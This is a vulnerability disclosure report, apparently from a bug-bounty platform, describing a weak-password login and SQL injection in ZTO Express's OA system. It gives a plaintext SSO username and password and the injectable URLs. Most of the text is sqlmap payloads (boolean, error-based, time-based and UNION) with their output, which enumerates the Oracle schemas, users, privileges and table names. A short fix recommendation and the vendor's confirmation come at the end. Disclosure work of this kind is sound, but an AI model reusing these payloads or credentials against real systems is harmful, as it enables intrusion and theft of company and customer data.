2015-11-02: 细节已通知厂商并且等待厂商处理中 2015-11-02: 厂商已经确认,细节仅向厂商公开 2015-11-12: 细节向核心白帽子及相关领域专家公开 2015-11-22: 细节向普通白帽子公开 2015-12-02: 细节向实习白帽子公开 2015-12-17: 细节向公众公开
后台弱口令+SQL注射
https://sso.zt-express.com
账号:18758251755密码:zto888888
注入点:
http://oa.zt-express.com/OA/InfoCenter/NobillInfo/showbig.aspx?method=&billnumber=716665&sign=nobillinfo
Payload: method=&billnumber=716665 AND 3621=3621&sign=nobillinfo Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: method=&billnumber=716665 AND 8035=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(112)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (8035=8035) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(122)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL)&sign=nobillinfo Type: AND/OR time-based blind Title: Oracle AND time-based blind (heavy query) Payload: method=&billnumber=716665 AND 3606=(SELECT COUNT(*) FROM ALL_USERST1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)&sign=nobillinfo Type: UNION query Title: Generic UNION query (NULL) - 19 columns Payload: method=&billnumber=-2252 UNION ALL SELECT NULL,CHR(113)||CHR(120)||CHR(112)||CHR(113)||CHR(113)||CHR(111)||CHR(69)||CHR(102)||CHR(76)||CHR(88)||CHR(99)||CHR(119)||CHR(69)||CHR(121)||CHR(77)||CHR(113)||CHR(107)||CHR(122)||CHR(112)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- &sign=nobillinfo---[20:53:48] [INFO] the back-end DBMS is Oracleweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Oracle[20:53:48] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes[20:53:48] [INFO] fetching database (schema) names[20:53:48] [INFO] the SQL query used returns 7 entries[20:53:48] [INFO] retrieved: CTXSYS[20:53:49] [INFO] retrieved: EXFSYS[20:53:49] [INFO] retrieved: MDSYS[20:53:49] [INFO] retrieved: NEWZTOOA[20:53:50] [INFO] retrieved: OLAPSYS[20:53:50] [INFO] retrieved: SYS[20:53:50] [INFO] retrieved: SYSTEMavailable databases [7]:[*] CTXSYS[*] EXFSYS[*] MDSYS[*] NEWZTOOA[*] OLAPSYS[*] SYS[*] SYSTEM
Payload: method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b' AND 9874=9874 AND 'XlcM'='XlcM Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b' AND 2870=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(107)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (2870=2870) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'eGnY'='eGnY---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Oracleavailable databases [7]:[*] CTXSYS[*] EXFSYS[*] MDSYS[*] NEWZTOOA[*] OLAPSYS[*] SYS[*] SYSTEMsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: CONSIGNMENTID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b' AND 9874=9874 AND 'XlcM'='XlcM Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b' AND 2870=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(107)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (2870=2870) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'eGnY'='eGnY---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Oracledatabase management system users privileges:[*] NEWZTOOA [15]: privilege: ADMINISTER DATABASE TRIGGER privilege: CREATE DATABASE LINK privilege: CREATE JOB privilege: CREATE PROCEDURE privilege: CREATE PUBLIC SYNONYM privilege: CREATE SEQUENCE privilege: CREATE SESSION privilege: CREATE TABLE privilege: CREATE TRIGGER privilege: CREATE TYPE privilege: CREATE USER privilege: CREATE VIEW privilege: DEBUG ANY PROCEDURE privilege: DEBUG CONNECT SESSION privilege: EXECUTE ANY PROCEDUREsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: CONSIGNMENTID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b' AND 9874=9874 AND 'XlcM'='XlcM Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b' AND 2870=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(107)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (2870=2870) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'eGnY'='eGnY---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Oracledatabase management system users [29]:[*] ANONYMOUS[*] CRM[*] CTXSYS[*] DBMS[*] DBSNMP[*] DIP[*] DMSYS[*] EXFSYS[*] MDDATA[*] MDSYS[*] NEWZTOOA[*] OGG_SYNC[*] OLAPSYS[*] ORACLE_OCM[*] ORDPLUGINS[*] ORDSYS[*] OUTLN[*] READONLY[*] SI_INFORMTN_SCHEMA[*] SYS[*] SYSTEM[*] TSMSYS[*] WDOA[*] WEIXIN[*] WMSYS[*] WULIAO[*] XDB[*] ZHONGCAI[*] ZTOWEBsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: CONSIGNMENTID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b' AND 9874=9874 AND 'XlcM'='XlcM Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b' AND 2870=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(107)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (2870=2870) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'eGnY'='eGnY---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: OracleDatabase: SYSTEM[8 tables]+----------------------+| DEF$_TEMP$LOB || HELP || MVIEW$_ADV_INDEX || MVIEW$_ADV_OWB || MVIEW$_ADV_PARTITION || OL$ || OL$HINTS || OL$NODES |+----------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: CONSIGNMENTID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b' AND 9874=9874 AND 'XlcM'='XlcM Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b' AND 2870=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(107)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (2870=2870) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'eGnY'='eGnY---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: OracleDatabase: NEWZTOOA[119 tables]+-------------------------------+| AA || DR$CONTENT_IDX$I || DR$CONTENT_IDX$R || TAB_A || TAB_ADDRESS_DISTRICT || TAB_ADDRESS_ZIPCODE || TAB_CENTER_RATES || TAB_GUARD_PIC || TAB_NO_PAYBQ || TAB_PROVINCE_TEMP || TAB_SITE_MONTHCOUNT || TAB_TAOBAO_AREA || TAB_TAOBAO_COMPLAINT || TAB_TAOBAO_GS || TAB_TAOBAO_RATE || TAB_TAOBAO_SPEED || TAB_TEST1 || TAB_ZTOA_AIRPORTCODE || TAB_ZTOA_AMERCE || TAB_ZTOA_AMERCETWO || TAB_ZTOA_ARBITRATION || TAB_ZTOA_ARBITRATIONAPPEAL || TAB_ZTOA_ARBITRATIONDISP || TAB_ZTOA_ARBITRATIONDISPSITE || TAB_ZTOA_ARBITRATIONMAKEKNOWN || TAB_ZTOA_ARBITRATIONSITE || TAB_ZTOA_ARBITRATIONSORT || TAB_ZTOA_ARBITRATIONTYPE || TAB_ZTOA_ASSET_APPLY || TAB_ZTOA_ASSET_APPLY_TRACK || TAB_ZTOA_ASSET_DICTIONARY || TAB_ZTOA_ASSET_NOTES || TAB_ZTOA_ASSET_VENDOR || TAB_ZTOA_BREAKBILL || TAB_ZTOA_BUSLINES || TAB_ZTOA_BUSNAME || TAB_ZTOA_CAHIERDATA || TAB_ZTOA_COMMENTON || TAB_ZTOA_CONSIGNMENT || TAB_ZTOA_CONSIGNMENTINFO || TAB_ZTOA_COURSEWARE || TAB_ZTOA_CUSTOMER || TAB_ZTOA_DATAINFO || TAB_ZTOA_DATASORT || TAB_ZTOA_DIGLOG || TAB_ZTOA_DISPOSEBOOK || TAB_ZTOA_DISPOSESITE || TAB_ZTOA_EMPLOYEE || TAB_ZTOA_FINANCE_LIST || TAB_ZTOA_FINANCE_TYPE || TAB_ZTOA_FLIGHTS || TAB_ZTOA_FUNCTIONMODULE || TAB_ZTOA_GUESTBOOK || TAB_ZTOA_HRBASICINFO || TAB_ZTOA_HRDUTY || TAB_ZTOA_HYPOLINER || TAB_ZTOA_HYPOLINERDATA || TAB_ZTOA_ITEQUIPMENT || TAB_ZTOA_ITREGISTER || TAB_ZTOA_ITSTORAGE || TAB_ZTOA_ITWORK || TAB_ZTOA_K8HELP || TAB_ZTOA_LEAVEBEHINDDATA || TAB_ZTOA_LOGINPAGE || TAB_ZTOA_MAINLINER || TAB_ZTOA_MAINLINERDATA || TAB_ZTOA_MOTIF || TAB_ZTOA_MOTIFCHILD || TAB_ZTOA_NEWSDEPARTMENT || TAB_ZTOA_NEWSSORT || TAB_ZTOA_NOBILL || TAB_ZTOA_OLDSCANGUN || TAB_ZTOA_ONDUTY || TAB_ZTOA_PAISONGFEI || TAB_ZTOA_PINGIP || TAB_ZTOA_PINGLIST || TAB_ZTOA_POSTCODE || TAB_ZTOA_POST_REPORT || TAB_ZTOA_PROVINCELINER || TAB_ZTOA_PROVINCELINERDATA || TAB_ZTOA_PUCHA || TAB_ZTOA_PUCHA_BAK || TAB_ZTOA_RELATINGPOSTCODE || TAB_ZTOA_REOPRTSITE || TAB_ZTOA_REPORTCHILD || TAB_ZTOA_ROLEFUNCTION || TAB_ZTOA_ROLES || TAB_ZTOA_SITEBOOK || TAB_ZTOA_SITEBOOKBACK || TAB_ZTOA_SITEMAP || TAB_ZTOA_SITEPROVINCE || TAB_ZTOA_SITEVISUALIZE || TAB_ZTOA_SQLTOCSV || TAB_ZTOA_SUFFRAGE || TAB_ZTOA_SUPERVISE || TAB_ZTOA_TASK || TAB_ZTOA_TASK_ADDED || TAB_ZTOA_TASK_FILE || TAB_ZTOA_TASK_USER || TAB_ZTOA_TRANSFERFEE || TAB_ZTOA_USERPHONE || TAB_ZTOA_USERSITEIT || TAB_ZTOA_USERTEL || TAB_ZTOA_USERVALIDATE || TAB_ZTOA_WEBLOG || TAB_ZTOA_WORKLOG || TAB_ZTOA_YIYUN1 || TAB_ZTOA_YIYUN2 || TAB_ZTOA_YZTJYB || TAB_ZTOA_ZHIFUBAO || TAB_ZTOA_ZTBEST || TAB_ZTOOA_IPMANAGE || TAB_ZTWEB_BILLSEARCHLOG || TAB_ZTWEB_CITY || TAB_ZTWEB_EXAMINEE || TAB_ZTWEB_JOB || TAB_ZTWEB_PROVINCE || TAB_ZTWEB_SITE2 || TAB_ZTWEB_SLIDE |+-------------------------------+sqlmap identified the following injection points with a total of 274 HTTP(s) requests:---Parameter: billnumber (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: method=&billnumber=716665 AND 3621=3621&sign=nobillinfo Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: method=&billnumber=716665 AND 8035=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(112)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (8035=8035) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(122)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL)&sign=nobillinfo Type: AND/OR time-based blind Title: Oracle AND time-based blind (heavy query) Payload: method=&billnumber=716665 AND 3606=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)&sign=nobillinfo Type: UNION query Title: Generic UNION query (NULL) - 19 columns Payload: method=&billnumber=-2252 UNION ALL SELECT NULL,CHR(113)||CHR(120)||CHR(112)||CHR(113)||CHR(113)||CHR(111)||CHR(69)||CHR(102)||CHR(76)||CHR(88)||CHR(99)||CHR(119)||CHR(69)||CHR(121)||CHR(77)||CHR(113)||CHR(107)||CHR(122)||CHR(112)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- &sign=nobillinfo---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Oracleavailable databases [7]:[*] CTXSYS[*] EXFSYS[*] MDSYS[*] NEWZTOOA[*] OLAPSYS[*] SYS[*] SYSTEMsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: billnumber (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: method=&billnumber=716665 AND 3621=3621&sign=nobillinfo Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: method=&billnumber=716665 AND 8035=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(112)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (8035=8035) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(122)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL)&sign=nobillinfo Type: AND/OR time-based blind Title: Oracle AND time-based blind (heavy query) Payload: method=&billnumber=716665 AND 3606=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)&sign=nobillinfo Type: UNION query Title: Generic UNION query (NULL) - 19 columns Payload: method=&billnumber=-2252 UNION ALL SELECT NULL,CHR(113)||CHR(120)||CHR(112)||CHR(113)||CHR(113)||CHR(111)||CHR(69)||CHR(102)||CHR(76)||CHR(88)||CHR(99)||CHR(119)||CHR(69)||CHR(121)||CHR(77)||CHR(113)||CHR(107)||CHR(122)||CHR(112)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- &sign=nobillinfo---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: OracleDatabase: NEWZTOOA[197 tables]+-------------------------------+| AA || AAAA || BASEITEMS || DR$CONTENT_IDX$I || DR$CONTENT_IDX$K || DR$CONTENT_IDX$N || DR$CONTENT_IDX$R || TAB_A || TAB_ADDRESS_DISTRICT || TAB_ADDRESS_ZIPCODE || TAB_CENTER_INFO || TAB_CENTER_RATES || TAB_COMMENT_INFO || TAB_COMMENT_LOG || TAB_GUARD_PIC || TAB_NO_PAYBQ || TAB_PROVINCE_TEMP || TAB_SITE_MONTHCOUNT || TAB_TAOBAO_AREA || TAB_TAOBAO_COMPLAINT || TAB_TAOBAO_GS || TAB_TAOBAO_RATE || TAB_TAOBAO_SPEED || TAB_TEST || TAB_TEST1 || TAB_TREE || TAB_VOTE_EMPLOYEE || TAB_VOTE_EMPLOYEE2014 || TAB_ZTOA_AIRPORTCODE || TAB_ZTOA_AMERCE || TAB_ZTOA_AMERCETWO || TAB_ZTOA_APPEARANCE || TAB_ZTOA_ARBITRATION || TAB_ZTOA_ARBITRATIONAPPEAL || TAB_ZTOA_ARBITRATIONDISP || TAB_ZTOA_ARBITRATIONDISPSITE || TAB_ZTOA_ARBITRATIONDUTYTYPE || TAB_ZTOA_ARBITRATIONMAKEKNOWN || TAB_ZTOA_ARBITRATIONSITE || TAB_ZTOA_ARBITRATIONSORT || TAB_ZTOA_ARBITRATIONTYPE || TAB_ZTOA_ASSET_APPLY || TAB_ZTOA_ASSET_APPLY_TRACK || TAB_ZTOA_ASSET_DICTIONARY || TAB_ZTOA_ASSET_NOTES || TAB_ZTOA_ASSET_VENDOR || TAB_ZTOA_BALE || TAB_ZTOA_BASESITE || TAB_ZTOA_BREAKBILL || TAB_ZTOA_BUSLINES || TAB_ZTOA_BUSNAME || TAB_ZTOA_CAHIERDATA || TAB_ZTOA_CARDFEES || TAB_ZTOA_CARDGS || TAB_ZTOA_COMMENTON || TAB_ZTOA_CONSIGNMENT || TAB_ZTOA_CONSIGNMENTINFO || TAB_ZTOA_CONTRABAND || TAB_ZTOA_COURSELECMAIN || TAB_ZTOA_COURSETYPE || TAB_ZTOA_COURSEWARE || TAB_ZTOA_COURSEWARENEW || TAB_ZTOA_CUSTOMER || TAB_ZTOA_DATAINFO || TAB_ZTOA_DATASORT || TAB_ZTOA_DIGLOG || TAB_ZTOA_DISPOSEBOOK || TAB_ZTOA_DISPOSESITE || TAB_ZTOA_DISPOSESITETWO || TAB_ZTOA_EMPLOYEE || TAB_ZTOA_EXPEDITEDATA || TAB_ZTOA_FAREINFO || TAB_ZTOA_FINANCE_LIST || TAB_ZTOA_FINANCE_TYPE || TAB_ZTOA_FLIGHTS || TAB_ZTOA_FUNCTIONMODULE || TAB_ZTOA_FUNCTIONMODULEBACK || TAB_ZTOA_GUESTBOOK || TAB_ZTOA_HRBASICINFO || TAB_ZTOA_HRDUTY || TAB_ZTOA_HRZHU || TAB_ZTOA_HRZI || TAB_ZTOA_HYPOLINER || TAB_ZTOA_HYPOLINERDATA || TAB_ZTOA_IMAGESTYPE || TAB_ZTOA_INVESTIGATE || TAB_ZTOA_ITBUEQUIPMENT || TAB_ZTOA_ITDELGOLD || TAB_ZTOA_ITEQUIPMENT || TAB_ZTOA_ITPROCESS || TAB_ZTOA_ITPROCESS_LIST || TAB_ZTOA_ITREGISTER || TAB_ZTOA_ITSTORAGE || TAB_ZTOA_ITWORK || TAB_ZTOA_ITWORKLOG || TAB_ZTOA_K8HELP || TAB_ZTOA_LEAVEBEHINDDATA || TAB_ZTOA_LECTURER || TAB_ZTOA_LOGINPAGE || TAB_ZTOA_MAINLINER || TAB_ZTOA_MAINLINERDATA || TAB_ZTOA_MOTIF || TAB_ZTOA_MOTIFCHILD || TAB_ZTOA_NETMAP || TAB_ZTOA_NEWS || TAB_ZTOA_NEWSCOMMENTON || TAB_ZTOA_NEWSDEPARTMENT || TAB_ZTOA_NEWSSORT || TAB_ZTOA_NOBILL || TAB_ZTOA_NOINAREA || TAB_ZTOA_OLDSCANGUN || TAB_ZTOA_ONDUTY || TAB_ZTOA_PAISONGFEI || TAB_ZTOA_PEER || TAB_ZTOA_PINGIP || TAB_ZTOA_PINGLIST || TAB_ZTOA_POSTCODE || TAB_ZTOA_POST_REPORT || TAB_ZTOA_PROVINCELINER || TAB_ZTOA_PROVINCELINERDATA || TAB_ZTOA_PUCHA || TAB_ZTOA_PUCHA_BAK || TAB_ZTOA_QHSOURCEINFO || TAB_ZTOA_QHSOURCETYPE || TAB_ZTOA_RELATINGPOSTCODE || TAB_ZTOA_REOPRTSITE || TAB_ZTOA_REPORTCHILD || TAB_ZTOA_REPORTVIOL || TAB_ZTOA_ROLEFUNCTION || TAB_ZTOA_ROLEFUNCTIONBACK || TAB_ZTOA_ROLES || TAB_ZTOA_SITEBOOK || TAB_ZTOA_SITEBOOKBACK || TAB_ZTOA_SITEBOOKTWO || TAB_ZTOA_SITECENTER || TAB_ZTOA_SITEEMPLOYEE || TAB_ZTOA_SITEINFO || TAB_ZTOA_SITEMAC || TAB_ZTOA_SITEMAP || TAB_ZTOA_SITEPROVINCE || TAB_ZTOA_SITESTATISTICS || TAB_ZTOA_SITEVISUALIZE || TAB_ZTOA_SPACE || TAB_ZTOA_SQLTOCSV || TAB_ZTOA_SUFFRAGE || TAB_ZTOA_SUM_GJ || TAB_ZTOA_SUM_ZTO || TAB_ZTOA_SUPERVISE || TAB_ZTOA_SUPERVISETWO || TAB_ZTOA_TASK || TAB_ZTOA_TASK_ADDED || TAB_ZTOA_TASK_FILE || TAB_ZTOA_TASK_USER || TAB_ZTOA_TRANSFERCENTERCAR || TAB_ZTOA_TRANSFERFEE || TAB_ZTOA_UNLOADDATA || TAB_ZTOA_USEROWNERPROVINCE || TAB_ZTOA_USERPHONE || TAB_ZTOA_USERSITEIT || TAB_ZTOA_USERTEL || TAB_ZTOA_USERVALIDATE || TAB_ZTOA_VEHICLE || TAB_ZTOA_VIOLATIONFINES || TAB_ZTOA_VIOLATIONPACKAGE || TAB_ZTOA_VIOLATIONPACKAGETYPE || TAB_ZTOA_WEBLOG || TAB_ZTOA_WORKLOG || TAB_ZTOA_WORKLOG_ADD || TAB_ZTOA_YIYUN1 || TAB_ZTOA_YIYUN2 || TAB_ZTOA_YIYUN3_YUNJIA || TAB_ZTOA_YZTJ22 || TAB_ZTOA_YZTJ23 || TAB_ZTOA_YZTJ24 || TAB_ZTOA_YZTJJ22 || TAB_ZTOA_YZTJJ23 || TAB_ZTOA_YZTJYB || TAB_ZTOA_ZHIFUBAO || TAB_ZTOA_ZTBEST || TAB_ZTOOA_IPMANAGE || TAB_ZTOPDA_PROVIDE || TAB_ZTWEB_BILLSEARCHLOG || TAB_ZTWEB_CITY || TAB_ZTWEB_EXAMINEE || TAB_ZTWEB_JOB || TAB_ZTWEB_NEWS || TAB_ZTWEB_PROVINCE || TAB_ZTWEB_SITE || TAB_ZTWEB_SITE2 || TAB_ZTWEB_SLIDE || TOAD_PLAN_TABLE || ZHONGTONG_ZHONGCAI_CHUFA || ZHONGTONG_ZHONGCAI_RIZHI || ZHONGTONG_ZHONGCAI_SHENQING || ZHONGTONG_ZHONGCAI_SHENSU || ZHONGTONG_ZHONGCAI_WANGDIAN || ZHONGTONG_ZHONGCAI_XIADA |+-------------------------------+
Payload: method=&billnumber=716665 AND 3621=3621&sign=nobillinfo Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: method=&billnumber=716665 AND 8035=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(112)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (8035=8035) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(122)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL)&sign=nobillinfo Type: AND/OR time-based blind Title: Oracle AND time-based blind (heavy query) Payload: method=&billnumber=716665 AND 3606=(SELECT COUNT(*) FROM ALL_USERST1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)&sign=nobillinfo Type: UNION query Title: Generic UNION query (NULL) - 19 columns Payload: method=&billnumber=-2252 UNION ALL SELECT NULL,CHR(113)||CHR(120)||CHR(112)||CHR(113)||CHR(113)||CHR(111)||CHR(69)||CHR(102)||CHR(76)||CHR(88)||CHR(99)||CHR(119)||CHR(69)||CHR(121)||CHR(77)||CHR(113)||CHR(107)||CHR(122)||CHR(112)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- &sign=nobillinfo---[21:57:22] [INFO] the back-end DBMS is Oracleweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Oracle[21:57:22] [INFO] fetching database users[21:57:23] [INFO] the SQL query used returns 29 entries[21:57:23] [INFO] retrieved: READONLY[21:57:23] [INFO] retrieved: WEIXIN[21:57:23] [INFO] retrieved: OGG_SYNC[21:57:23] [INFO] retrieved: CRM[21:57:25] [INFO] retrieved: DBMS[21:57:25] [INFO] retrieved: WULIAO[21:57:25] [INFO] retrieved: ZHONGCAI[21:57:25] [INFO] retrieved: NEWZTOOA[21:57:26] [INFO] retrieved: ZTOWEB[21:57:26] [INFO] retrieved: MDDATA[21:57:26] [INFO] retrieved: MDSYS[21:57:27] [INFO] retrieved: SI_INFORMTN_SCHEMA[21:57:27] [INFO] retrieved: ORDPLUGINS[21:57:27] [INFO] retrieved: ORDSYS[21:57:28] [INFO] retrieved: OLAPSYS[21:57:28] [INFO] retrieved: WDOA[21:57:28] [INFO] retrieved: ANONYMOUS[21:57:28] [INFO] retrieved: XDB[21:57:28] [INFO] retrieved: CTXSYS[21:57:29] [INFO] retrieved: EXFSYS[21:57:29] [INFO] retrieved: WMSYS[21:57:29] [INFO] retrieved: ORACLE_OCM[21:57:29] [INFO] retrieved: DBSNMP[21:57:29] [INFO] retrieved: TSMSYS[21:57:32] [INFO] retrieved: DMSYS[21:57:32] [INFO] retrieved: DIP[21:57:32] [INFO] retrieved: OUTLN[21:57:33] [INFO] retrieved: SYSTEM[21:57:33] [INFO] retrieved: SYSdatabase management system users [29]:[*] ANONYMOUS[*] CRM[*] CTXSYS[*] DBMS[*] DBSNMP[*] DIP[*] DMSYS[*] EXFSYS[*] MDDATA[*] MDSYS[*] NEWZTOOA[*] OGG_SYNC[*] OLAPSYS[*] ORACLE_OCM[*] ORDPLUGINS[*] ORDSYS[*] OUTLN[*] READONLY[*] SI_INFORMTN_SCHEMA[*] SYS[*] SYSTEM[*] TSMSYS[*] WDOA[*] WEIXIN[*] WMSYS[*] WULIAO[*] XDB[*] ZHONGCAI[*] ZTOWEB
修改密码,过滤sql特殊字符
危害等级:高
漏洞Rank:10
确认时间:2015-11-02 15:52
感谢白帽子的辛苦劳动,此系统注入点很多,近期就会下线。
暂无
